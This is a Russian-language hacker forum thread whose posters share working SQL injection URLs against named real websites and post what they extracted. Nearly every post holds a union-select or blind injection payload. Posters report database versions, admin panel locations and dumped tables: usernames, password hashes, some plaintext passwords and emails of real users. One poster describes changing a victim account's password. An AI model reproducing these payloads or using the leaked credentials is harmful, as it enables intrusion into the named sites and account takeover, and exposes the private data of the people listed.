gismeteo.ru В антибаяне нет, а так не помню было ли (Не ругаем сильно =) ) _http://avia.gismeteo.ru/avia.php?id=26063+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71)/* Версия - 4.1.1-alpha-standard База - search Пользователь - root@localhost
2 Snap http://avia.gismeteo.ru/avia.php?id=26063+UNION+SELECT+CONCAT_WS(0x3a,user,password),2,3,4,5,6,7+from+mysql.user/* добавочка..хотя и не интересная
Еще сайтик с погодой http://www.hmn.ru Вывод сволоч отсутствует или я где то ошибку допустил. Таблица и поля подобранны верно. _http://www.hmn.ru/index1.php?code=1&nn=-1637+union+select+1,concat_ws(login,char(58),password),3,4,5,6,7,8+from+users/*
2 Snap ну если вывода нет, тогда юзаем подзапросы..хоты это геморно, но..надо Федя , надо Version:4.1.20 User:nobody@localhost Database:test а вот и хешики Max:629cf3f287a256ef09d0fe907ca6f8a6 Max1:098f6bcd4621d373cade4e832627b4f6 : test roman:6ccd26e0cf9a27d3a42eb62257592789: c1492 Pozd:ce6d9e1dc29e7363f338ca0de2b1d75a: ptd и так далее и тому подобное..подозреваю что есть еще и табелка с юзверями форума..но это уже другая история
И не выйдет... Там 3-ий мускул стоит, соответственно всякие подзапросы и юнионы идут лесом. Максимум, что сможешь поднять - инфу из той же табы к которой запрос обращается и то, может быть. Собственно, вот какие инъекции там есть: Я работал с этой: version(): 3.23.58 Если сильно надо - можешь там покопаться, а так - забей лучше...
пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл Constantine: mod_rewrite тебе ни о чем не говорит? http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html Database Version: 4.1.21-standard Database name: level_nou User name: level@localhost подобрал табелку user но колонки так и не смог http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((current_database()),6,1))=xxx-- current_database() : autohit_ro current_user() : autohit version(): PostgreSQL вывода нет, о можно побрутить сиптом, главное запрос правильно составить не забывайте что тут есть Information_Schema или PG_TABLES ну и конечно не забывайте что в PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET табелки брутить не стал, оставляю это удовольствие вам
http://www.2goroda.ru/ http://www.2goroda.ru/News/newsfp.php?n=-1+union+select+1,2,3,4,concat(username,0x3a,user_password)%20,6,7,8+from+phpbb_users+limit+4,10/* Выискиваем: user:magnum pass:6666 меняем пас юзеру Master на 'anus' Вроде как админка по адресу http://www.2goroda.ru/Poll/admin/index.php Но таблу так и не подобрал на это дело. Зы: Впервые вижу такого дибила, который на пасворд '6666' ставит =)
Code: http://www.neilprydemaui.com/items.php?id=-48+union+select+1,2,concat_ws(0xEF,version()),4,5,6,7,8,9,10,11/*
color-style.ru Code: http://www.color-style.ru/catalogue.php?sect_id=3+and+substring(version(),1,1)=5/* Database Version: 5.0.45-log Database name: u91786 User name: [email protected] таблица CUSTOMERS login:passwd:email [1]:admin:admin: [2]:garry:qazzaq:[email protected] [3]:ivan:ivan:[email protected] [4]:nata:1: [5]:anjelika:anjelika: [6]:viktor:viktor:[email protected] ................................................... .................................................. [77]:alisa:alisa: [78]:alisak:alisak:[email protected] [79]:Olga:030393:[email protected] [80]:Arinako:Cfytxtr:[email protected] Ксожелению юзер пасс к админке в бд не храняться (
В добовление к вчерашним Метео сайтам. Не навиду Метео прогнозы вечно врут гады.... http://www.meteo-tv.ru (Пожалуй самая популярная программа о погоде. Почти по всем каналам крутят) http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(login,char(58),password),4,5,6,7+from+users+limit+1,1/* admin:40bd001563085fc35165329ea1ff5c5ecbdbbeef (Ну и форум туда же ) http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(username,char(58),user_password),4,5,6,7+from+forum_users+limit+1,1/* viking:a37c3645bb4a1ea0f112ad60b8e6a581 -------------------------------------------------------------------------------------------------------------- http://pogoda.ru.net/ (Тут появились некоторые сложности скуля есть, а вот с выводом проблемы нужны подзапросы если правельно мыслю....) http://pogoda.ru.net/records.php?d=7'+union+select+1,2,3,4,5,6,7,8,9,10,11/* -------------------------------------------------------------------------------------------------------------- http://www.meteo-gid.ru (Еще один идиотский проэкт http://www.meteo-tv.ru) С таблицами не стал мучиться если кому будет интересно думаю найдете =) http://www.meteo-gid.ru/index.php?pageId=3&newsId=382+union+select+1,2,concat(table_name,char(58),column_name,char(58),table_schema),4,5,6,7,8+from+information_schema.columns+limit+1,1/*
www.agrifoodskills.net.au user() = agrione@localhost version() = 4.0.20a-nt database() = agrirev http://www.agrifoodskills.net.au/display_announce.php?id=44444444444441/**/union/**/select/**/concat_ws(0x3a,username,password)/**/from/**/users/**/limit/**/0,1/* count from users = 139 ricktu:e1da02cc31d9a7ffaaf9d759cfe2c8fc jane:b9a51726733fd31e3b4cd7dfb272f7fa Justin Lazic:18cdeae7b347cc1518f4537476032435 justin:e10adc3949ba59abbe56e057f20f883e kateb:2b10435032f537ce08893c0962878796 wendyskelton:e5e7105d5c05d9c0cc5944ff1341b533 ... ... админка = http://www.agrifoodskills.net.au/admin.php но пароли не подходят там еще и форум есть
Code: http://presse.kaspersky.fr/presse.php?type=&article=&bibid=9999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,password),9,10,11,version(),13,14,15,16++from+agora.agora_users/* Mysql: 5.0.38-Dotdeb_1.dotdeb.0-log User/password : support/9dd3ba637ec2fcaf383415617d39e002
Code: http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/* user: renewabl_webuser имя БД: renewabl_mhpwebsite но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия))
Зачем брутить? http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+users/* Бери аккаунт, администраторский или нет - хз. не проверял. Сейчас займусь. Аккаунт не администраторский. директория /admin/ защищена. Значит, есть аналог admin.php либо adm.php(я проверял. 404)
Вот же ссылка http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+users/* kubu : freedom Или http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+users+limit+1,1/* и пр. Пытайся сначала работать по стандартным таблицам. user, users, admin, admins, и пр. Если 4 ветка Mysql не факт, что безрезультатно . Практикуйся
хотел тут хекнуть сайт с марио, но нашол только маеро Code: http://www.mae.ro/index.php?unde=doc&id=-1+union+select+table_name+from+information_schema.tables+limit+50,1 Ps: http://www.mae.ro/admin/
http://www.bmprocess.ru/equipment/fn?id=-1+union+select+username,password+from+u39424.joooos_users+limit+0,10/* login:admin password: c845e471514d11f6b87e8d409efe313e Не брутится курва =)
sellhouse.com.au user() = sel7_aGrGOLO@localhost version() = 4.1.18 database() = agraub9-2 есть таблица мемберс с открытми паролями count from members = 158 http://sellhouse.com.au/detail.php?property=465555542/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat_ws(0x3a,id,email,password),0x71),0x71),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/members/**/limit/**/1,1/*
